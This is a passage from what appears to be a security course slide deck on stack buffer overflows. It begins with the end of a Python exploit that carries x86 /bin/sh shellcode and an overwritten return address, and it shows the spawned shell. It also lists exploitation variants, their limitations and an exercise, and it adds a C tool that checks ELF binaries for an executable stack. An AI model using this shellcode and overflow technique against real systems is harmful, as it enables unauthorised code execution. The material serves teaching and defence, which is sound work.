      "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
      "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")
nop_sled = overflow_len - len(sc)
sc_addr = struct.pack("<I", ret_addr)
ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr)
os.execve(target_path, (target_path, ex), os.environ)
  • 12. Result
cisco@kali:~/src/seccon/ch3$ invoke ch3.py
$ id
uid=1000(cisco) gid=1001(cisco) groups=1001(cisco)
$ exit
cisco@kali:~/src/seccon/ch3$
  • 13. Variations
 Small buffers (shellcode doesn’t fit): append shellcode after the return address
Buffer layout (figure): SC Address / Junk / Shellcode
 Unpredictable buffer address (stack size is not under control): prepend a NOP sled to the shellcode:
Buffer layout (figure): NOP sled / Shellcode / SC Address
 Use an environment variable to host your shellcode
  • 14. Limitations
 Shellcode is executed on the stack, so the stack needs to be executable
 Buffer address is known, so addresses can’t be randomized
 Stack frame is not protected (more on this later)
 There are no null bytes in our buffer address (this can be fixed easily)
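The first limitation is decided by one ELF program header: `-z execstack` on slide 5 sets the PF_X bit on PT_GNU_STACK, and the kernel maps the stack executable only when that bit is set (or when the header is missing entirely, as with very old toolchains). The following added example, which is not code from the deck, performs that check the way a checksec-style tool does, so the "is this binary still exploitable the Aleph One way" question can be answered before the exercise on the next slide. The structure and constant names come from `<elf.h>`; `stack_state_from_image()`, the enum of verdicts and the constructed in-memory ELF32 images are this example's own.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

enum stack_state {
    STACK_BADELF  = -1,   /* not a usable ELF32 image */
    STACK_NOEXEC  = 0,    /* PT_GNU_STACK present without PF_X */
    STACK_EXEC    = 1,    /* PT_GNU_STACK with PF_X: -z execstack */
    STACK_MISSING = 2     /* no PT_GNU_STACK at all: kernel defaults to executable */
};

/* Inspect an ELF32 image held in memory (example code, assumed interface). */
int stack_state_from_image(const unsigned char *img, size_t len) {
    Elf32_Ehdr eh;
    if (len < sizeof eh) {
        return STACK_BADELF;
    }
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 || eh.e_ident[EI_CLASS] != ELFCLASS32) {
        return STACK_BADELF;
    }
    if (eh.e_phentsize != sizeof(Elf32_Phdr)) {
        return STACK_BADELF;
    }
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        size_t off = (size_t)eh.e_phoff + (size_t)i * sizeof(Elf32_Phdr);
        if (off + sizeof(Elf32_Phdr) > len) {
            return STACK_BADELF;               /* program header table is truncated */
        }
        Elf32_Phdr ph;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) {
            return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NOEXEC;
        }
    }
    return STACK_MISSING;
}

/* Constructed test data: a minimal ELF32 image whose single program header has
 * the given type and flags. Returns the number of bytes written, 0 if cap is too small. */
size_t build_image(unsigned char *buf, size_t cap, uint32_t type, uint32_t flags) {
    Elf32_Ehdr eh;
    Elf32_Phdr ph;
    size_t total = sizeof eh + sizeof ph;
    if (cap < total) {
        return 0;
    }
    memset(&eh, 0, sizeof eh);
    memset(&ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS32;
    eh.e_phoff = sizeof eh;                    /* table immediately follows the header */
    eh.e_phentsize = sizeof ph;
    eh.e_phnum = 1;
    ph.p_type = type;
    ph.p_flags = flags;
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, &ph, sizeof ph);
    return total;
}

/* Build a constructed image and classify it in one call. */
int state_of_constructed(uint32_t type, uint32_t flags) {
    unsigned char buf[sizeof(Elf32_Ehdr) + sizeof(Elf32_Phdr)];
    size_t n = build_image(buf, sizeof buf, type, flags);
    return stack_state_from_image(buf, n);
}

/* Classify a real ELF32 file. Only the first 1 MiB is read; the program header
 * table of a linked executable sits right behind the ELF header. */
int stack_state_from_file(const char *path) {
    FILE *f = fopen(path, "rb");
    if (f == NULL) {
        return STACK_BADELF;
    }
    size_t cap = 1u << 20, len = 0;
    unsigned char *img = malloc(cap);
    if (img != NULL) {
        len = fread(img, 1, cap, f);
    }
    fclose(f);
    int st = img != NULL ? stack_state_from_image(img, len) : STACK_BADELF;
    free(img);
    return st;
}

int main(int argc, char **argv) {
    static const char *names[] = { "non-executable stack", "EXECUTABLE stack (-z execstack)",
                                   "no PT_GNU_STACK header (treated as executable)" };
    if (argc < 2) {
        /* No file given: show the three verdicts on constructed images. */
        printf("constructed RW  stack: %s\n", names[state_of_constructed(PT_GNU_STACK, PF_R | PF_W)]);
        printf("constructed RWX stack: %s\n", names[state_of_constructed(PT_GNU_STACK, PF_R | PF_W | PF_X)]);
        printf("constructed, no GNU_STACK: %s\n", names[state_of_constructed(PT_LOAD, PF_R | PF_X)]);
        return 0;
    }
    int st = stack_state_from_file(argv[1]);
    if (st < 0) {
        fprintf(stderr, "%s: not a usable ELF32 image\n", argv[1]);
        return 1;
    }
    printf("%s: %s\n", argv[1], names[st]);
    return 0;
}
```

Run it against the `ch3` built on slide 5 and it reports the executable stack; rebuild without `-z execstack` (or with `-z noexecstack`) and the verdict flips, which is the one-protection experiment slide 15 asks for. The same header is what `readelf -lW ch3 | grep GNU_STACK` prints, so the tool is only a convenience for scripting the check over many binaries.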
  • 15. Now get to work
 Compile and exploit ch3
 Try any different exploitation technique described previously
 Don’t use the “invoke” script when trying to exploit. What is happening to the stack? Why is your exploit failing?
 Enable one memory protection (whichever). Check the effect on the exploit